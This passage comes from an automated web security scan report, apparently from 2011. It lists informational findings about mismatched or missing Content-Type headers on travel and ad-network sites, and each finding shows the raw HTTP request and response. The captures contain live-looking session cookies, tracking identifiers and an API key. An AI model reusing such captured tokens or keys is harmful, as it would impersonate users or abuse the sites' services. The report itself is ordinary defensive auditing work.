Set-Cookie: TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.7*MC.11893*LS.HotelCheckRates*PD-2147.1*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*FS.25*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*CU.USD*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.hotwire%5C.com%2Fhotel%2Fdetails%5C.jsp%3FactionType%3D2%26inputId%3Dhotel-results%26searchId%3D6111849947%26selectedSolutionId%3D135420317134%26selectedPGoodId%3D236179701665*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals-a_checkin%5C.10%252F9%252F2011-qbos-a_adults%5C.1-m11893-a_checkout%5C.10%252F16%252F2011*FS.37*FBH.6*TRA.true*LL.4139281*LD.258705*EWS.CheckMore; Domain=.tripadvisor.com; Path=/
Set-Cookie: ServerPool=T; Domain=.tripadvisor.com; Path=/
Set-Cookie: PassThruUrlArgs=null; Domain=.tripadvisor.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 19
Connection: close
Content-Type: text/html;charset=UTF-8

<!--check rates-->

28.115. http://www.tripadvisor.com/api/ratinginfo/1.0/getRating

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tripadvisor.com
Path:   /api/ratinginfo/1.0/getRating

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=utf-8

The response states that it contains plain text. However, it actually appears to contain CSS. The body is a JSONP callback invocation, i.e. JavaScript, not CSS, served as text/plain. Because the response carries no X-Content-Type-Options: nosniff header, browsers still execute it when the calling page includes it via a script element; the correct type is application/javascript.

Request

GET /api/ratinginfo/1.0/getRating?key=4cd5d1bc-7d71-4eea-afde-d52f9a1a247c&lang=en&locationId=4215&callback=YAHOO.cx.exp.widget.infosite.TripAdvisor.processTripAdvisorJasonResponse HTTP/1.1
Host: www.tripadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:18 GMT
Server: Apache
Content-Length: 371
Connection: close
Content-Type: text/plain; charset=utf-8

YAHOO.cx.exp.widget.infosite.TripAdvisor.processTripAdvisorJasonResponse({
"hotelDetailUrl": "http://www.tripadvisor.com/Hotel_Review-g60745-d111418-Reviews-m13878-The_Boston_Park_Plaza_Hotel_Towers
...[SNIP]...

28.116. http://www.turkishairlines.com/data/gateway.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.turkishairlines.com
Path:   /data/gateway.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain XML. The body is an HTML list fragment (<li>...</li>) returned to an XMLHttpRequest, so text/html is correct; the XML classification is a heuristic artefact.

Request

GET /data/gateway.aspx?country=197 HTTP/1.1
Host: www.turkishairlines.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html, */*; q=0.01
Referer: http://www.turkishairlines.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ksso3m55td3pq4almj0x3k45; __utma=1.1413828058.1317599904.1317599904.1317599904.1; __utmb=1.1.10.1317599904; __utmc=1; __utmz=1.1317599904.1.1.utmcsr=manutd.com|utmccn=(referral)|utmcmd=referral|utmcct=/Search-Results.aspx

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:01:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 198

<li><span class="ui-icons ui-icons-ggw-cities"></span><a href="/en-CA/index.aspx">English</a></li><li><span class="ui-icons ui-icons-ggw-cities"></span><a href="/fr-CA/index.aspx">Français</a></li>

28.117. http://www.turkishairlines.com/data/promotion.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.turkishairlines.com
Path:   /data/promotion.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script. The body is a JSON array served as text/html; the correct type is application/json. With text/html, a browser that opens this URL directly renders the JSON as a page, so any user-controllable data in it would be interpreted as HTML.

Request

POST /data/promotion.aspx HTTP/1.1
Host: www.turkishairlines.com
Proxy-Connection: keep-alive
Content-Length: 44
Origin: http://www.turkishairlines.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.turkishairlines.com/en-CA/index.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ksso3m55td3pq4almj0x3k45; __utma=1.1413828058.1317599904.1317599904.1317599904.1; __utmb=1.2.10.1317599904; __utmc=1; __utmz=1.1317599904.1.1.utmcsr=manutd.com|utmccn=(referral)|utmcmd=referral|utmcct=/Search-Results.aspx

lang=en-CA&siteid=80&p=carousel&mod=carousel

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 5700

[ {"PROMOSYON_ID":"AMS2B27FEIST","SITE_ID":"11","SIRA":"1","KALKISKOD":"AMS","VARISKOD":"IST","DOMESTIC":"False","namekalkis":"Amsterdam","name":"Istanbul","KALKIS":"Schiphol Havalimanı","VARIS":"Ata
...[SNIP]...

28.118. http://www.turkishairlines.com/en-CA/quicksearch.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.turkishairlines.com
Path:   /en-CA/quicksearch.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: application/json; charset=utf-8

The response states that it contains JSON. However, it actually appears to contain unrecognised content. The body is a JavaScript assignment (arrayAirports={arrayAirports: [{display: ...) with unquoted keys, which a JSON parser rejects, so the declared application/json is wrong; either the body should be valid JSON or the type should be a JavaScript one.

Request

GET /en-CA/quicksearch.aspx HTTP/1.1
Host: www.turkishairlines.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.turkishairlines.com/en-CA/index.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ksso3m55td3pq4almj0x3k45; __utma=1.1413828058.1317599904.1317599904.1317599904.1; __utmb=1.1.10.1317599904; __utmc=1; __utmz=1.1317599904.1.1.utmcsr=manutd.com|utmccn=(referral)|utmcmd=referral|utmcct=/Search-Results.aspx

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: application/json; charset=utf-8
Content-Length: 66718

arrayAirports={arrayAirports: [{display: "Abu Dhabi Airport",lookup1: "ABU DHABİ AİRPORT",airport_code: "AUH",city_code: "AUH",country_name: "UNITED ARAB EMIRATES",city_name: "Abu Dhabi",tags: "Abu
...[SNIP]...

28.119. http://www9.effectivemeasure.net/v4/em_js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www9.effectivemeasure.net
Path:   /v4/em_js

Issue detail

The response contains the following Content-type statement:

Content-type: text/javascript

The response states that it contains script. However, it actually appears to contain plain text. The body is JavaScript (_em.setCkHl() and related calls), so the declared text/javascript is correct; the plain-text classification is a heuristic artefact.

Request

GET /v4/em_js?flag=0&v=&vt=&hl=&sv=0&pv=&pn=&p=aHR0cDovL3d3dy5nb2FsLmNvbS9lbi90ZWFtcy9lbmdsYW5kLzk3L21hbi11dGQtbmV3cw%3D%3D&r=&f=1&ns=_em&rnd=0.11160158668644726&u=&sf=1& HTTP/1.1
Host: www9.effectivemeasure.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/teams/england/97/man-utd-news
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hl=1; vt=ad466b7502917b9a0779b9e202024e62e18088e413-981323754e62e3b1

Response

HTTP/1.1 200 OK
P3P: policyref="http://www.effectivemeasure.net/w3c/p3p.xml", CP="NOI DSP COR NID PSA ADM OUR IND UNI NAV COM"
Pragma: no-cache
Cache-Control: no-cache
Cache-Control: no-cache, must-revalidate
Pragma-directive: no-cache
Cache-Directive: no-cache
Expires: 0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: hl=1; expires=Tue, 01-Nov-2011 23:52:45 GMT; path=/; domain=.effectivemeasure.net
Set-Cookie: vt=92ca95cf72da02be93a9b9e202024e62e18088e413-981323754e88f94d; expires=Wed, 26-Sep-2012 23:52:45 GMT; path=/; domain=.effectivemeasure.net
Set-Cookie: v=452d73c7cba4bbda22aaf13bd6fa4e88f8d57af834-210214684e88f94d338_5280; expires=Mon, 03-Oct-2011 00:22:45 GMT; path=/; domain=.effectivemeasure.net
Content-type: text/javascript
Connection: close
Content-Length: 186
Date: Sun, 02 Oct 2011 23:52:45 GMT
Server: C20

_em._domain="goal.com";_em.setCkHl();_em.setCkVt("92ca95cf72da02be93a9b9e202024e62e18088e413-981323754e88f94d");_em.setCkV("452d73c7cba4bbda22aaf13bd6fa4e88f8d57af834-210214684e88f94d");

29. Content type is not specified
There are 39 instances of this issue:

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

29.1. http://ad.technoratimedia.com/st

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.technoratimedia.com
Path:   /st

Request

GET /st?pfm=1&tlfs=ch&tmen=ch&tphv=ch&rtg=ga&brw=cr3&os=wn7&prm=0&efo=0&atf=1&uatRandNo=65268&ad_type=ad&section=1782250&ad_size=300x250 HTTP/1.1
Host: ad.technoratimedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:52:56 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sun, 02 Oct 2011 23:52:56 GMT
Pragma: no-cache
Content-Length: 4383
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passb
...[SNIP]...

29.2. http://ad.yieldmanager.com/st

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Request

GET /st?ad_type=ad&ad_size=468x60&section=2398370 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:48:54 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Sun, 02 Oct 2011 23:48:54 GMT
Pragma: no-cache
Content-Length: 4292
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passb
...[SNIP]...

29.3. http://orbitz.tt.omtrdc.net/m2/orbitz/mbox/standard

Summary

Severity:   Information
Confidence:   Certain
Host:   http://orbitz.tt.omtrdc.net
Path:   /m2/orbitz/mbox/standard

Request

GET /m2/orbitz/mbox/standard?mboxHost=www.orbitz.com&mboxSession=1317600406536-142286&mboxPage=1317600562009-125559&screenHeight=1200&screenWidth=1920&browserWidth=700&browserHeight=700&browserTimeOffset=-300&colorDepth=16&mboxCount=2&numberOfNights=3&numberOfRooms=1&hotelSRNavigationSegment=1&mbox=hotel200&mboxId=0&mboxTime=1317582605700&mboxURL=http%3A%2F%2Fwww.orbitz.com%2Fshop%2Fhotelsearch%3Ftype%3Dhotel%26hotel.keyword.key%3DBoston%252CUnited%2520States%26hotel.rooms%5B0%5D.adlts%3D1%26hotel.type%3Dkeyword%26hotel.chkin%3D10%2F04%2F11%26hotel.chkout%3D10%2F07%2F11%26search%3DSearch%26WT.mc_ev%3Dclick%26WT.mc_id%3Do_igo_merch_city_dated%26gcid%3DC11287x600-CYBoston%2CUnited%2520States%26lpid%3Dplhot&mboxVersion=39 HTTP/1.1
Host: orbitz.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.keyword.key=Boston%2CUnited%20States&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/04/11&hotel.chkout=10/07/11&search=Search&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Length: 89
Date: Mon, 03 Oct 2011 00:10:08 GMT
Server: Test & Target

mboxFactories.get('default').get('hotel200',0).setOffer(new mboxOfferDefault()).loaded();

29.4. http://orbitzaway.tt.omtrdc.net/m2/orbitzaway/sc/standard

Summary

Severity:   Information
Confidence:   Certain
Host:   http://orbitzaway.tt.omtrdc.net
Path:   /m2/orbitzaway/sc/standard

Request

GET /m2/orbitzaway/sc/standard?mboxHost=www.trip.com&mboxSession=1317602099178-690078&mboxPage=1317602099178-690078&mboxCount=3&mbox=SiteCatalyst%3A%20event&mboxId=0&mboxTime=1317584104035&visitorNamespace=orbitzaway&pageName=Flights&currencyCode=USD&channel=Compare_Rates&server=trip.com&campaign=1&events=event2&resolution=1920x1200&colorDepth=16&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&browserWidth=0&browserHeight=0&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cpdf%2Cdoc%2Cdocx%2Cxls%2Cxlsx%2Cppt%2Cpptx&linkInternalFilters=javascript%3A%2Ctrip.com&linkTrackVars=None&linkTrackEvents=None&prop8=Data%20Not%20Available&eVar8=Data%20Not%20Available&prop9=Data%20Not%20Available&eVar9=Data%20Not%20Available&prop10=Data%20Not%20Available&eVar10=Data%20Not%20Available&eVar11=Flights&eVar12=Compare_Rates&mboxURL=http%3A%2F%2Fwww.trip.com%2F%3Ftype%3Dair%26utm_source%3Dorbitz%26utm_medium%3Dcrpopunder%26utm_content%3Dair%26utm_campaign%3Dtriplooking%26cmpid%3D1&mboxReferrer=&mboxVersion=38&scPluginVersion=1 HTTP/1.1
Host: orbitzaway.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.trip.com/?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Length: 220
Date: Mon, 03 Oct 2011 00:35:07 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1317602099178-690078.19");mboxFactories.get('default').get('SiteCatalyst: event', 0).setOffer(new mboxOfferD
...[SNIP]...

29.5. http://pcm1.map.pulsemgr.com/uds/pc

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pcm1.map.pulsemgr.com
Path:   /uds/pc

Request

GET /uds/pc?ptnr=21272&sig=7f55db33fbb1aeb3132ef7151d50c9d9 HTTP/1.1
Host: pcm1.map.pulsemgr.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://bh.contextweb.com/bh/visitormatch?tag=106934&pid=538936
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p=OPTOUT; c=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 43
Date: Sun, 02 Oct 2011 23:50:13 GMT
Connection: close

GIF89a.............!.......,...........D..;

29.6. http://www.aon.com/manchesterunited/fougrdbd-webfont.ttf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aon.com
Path:   /manchesterunited/fougrdbd-webfont.ttf

Request

GET /manchesterunited/fougrdbd-webfont.ttf HTTP/1.1
Host: www.aon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.aon.com/manchesterunited/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FDA5F4B4BB1AB049D12027B006BB7DA5; s_pers=%20gpv_pageName%3D/manchesterunited/%7C1317601722252%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"56888-1314119277000"
Last-Modified: Tue, 23 Aug 2011 17:07:57 GMT
Content-Length: 56888
Date: Sun, 02 Oct 2011 23:59:11 GMT

........... FFTMSQP`........GDEF.L.........\GPOS.......h....GSUB.5xO...0...6OS/2..k........`cmap..A.........cvt ......
....<fpgm../....d...egasp............glyf...q.......@head.......,...6hhea...q...d
...[SNIP]...

29.7. http://www.aon.com/manchesterunited/vagroundedstd-light-webfont.ttf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aon.com
Path:   /manchesterunited/vagroundedstd-light-webfont.ttf

Request

GET /manchesterunited/vagroundedstd-light-webfont.ttf HTTP/1.1
Host: www.aon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.aon.com/manchesterunited/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FDA5F4B4BB1AB049D12027B006BB7DA5; s_pers=%20gpv_pageName%3D/manchesterunited/%7C1317601722252%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"55356-1314119279000"
Last-Modified: Tue, 23 Aug 2011 17:07:59 GMT
Content-Length: 55356
Date: Sun, 02 Oct 2011 23:59:12 GMT

...........0BASE?bO........4FFTMG.GM... ....GDEF.;.........8GPOS...........4GSUB/.%.........OS/2z.7*.......`cmap..A.........cvt ..    O..
P...2fpgm../....t...egasp............glyf...t...P....head.C.....<
...[SNIP]...

29.8. http://www.expedia.com/static/default/default/eta/commonIcons.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/default/default/eta/commonIcons.gif

Request

GET /static/default/default/eta/commonIcons.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"2287-1317085605073"
Last-Modified: Tue, 27 Sep 2011 01:06:45 GMT
Content-Length: 2287
Date: Mon, 03 Oct 2011 00:10:23 GMT
Connection: close

GIF89a..X..U.....f.3f.I...........Ky....P}.................)..........o\Vg......r....O8......Hu............................D+...t...j.Z..l....6[..:k.T}.x........t....6.V@...............i~...........
...[SNIP]...

29.9. http://www.expedia.com/static/default/default/html/calendar/v2.0.0/calendar.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/default/default/html/calendar/v2.0.0/calendar.html

Request

GET /static/default/default/html/calendar/v2.0.0/calendar.html HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"23583-1317080291907"
Last-Modified: Mon, 26 Sep 2011 23:38:11 GMT
Content-Length: 23583
Date: Mon, 03 Oct 2011 00:11:16 GMT
Connection: close

<!DOCTYPE HTML>
<html>
<head>
<META http-equiv=Content-Type content="text/html; charset=UTF-8">
<script type="text/javascript" src="//media.expedia.com/media/content/shared/scripts/external/jquery/1.6.1/jquery.min.js">
...[SNIP]...

29.10. http://www.expedia.com/static/default/default/images/bubble_left_onblue.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/default/default/images/bubble_left_onblue.gif

Request

GET /static/default/default/images/bubble_left_onblue.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/static/default/default/html/calendar/v2.0.0/calendar.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"627-1317085591070"
Last-Modified: Tue, 27 Sep 2011 01:06:31 GMT
Content-Length: 627
Date: Mon, 03 Oct 2011 00:10:40 GMT
Connection: close

GIF89a.....Y....T}.T}................W..................................................................................................................................................................
...[SNIP]...

29.11. http://www.expedia.com/static/default/default/images/bubble_right_onblue.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/default/default/images/bubble_right_onblue.gif

Request

GET /static/default/default/images/bubble_right_onblue.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/static/default/default/html/calendar/v2.0.0/calendar.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
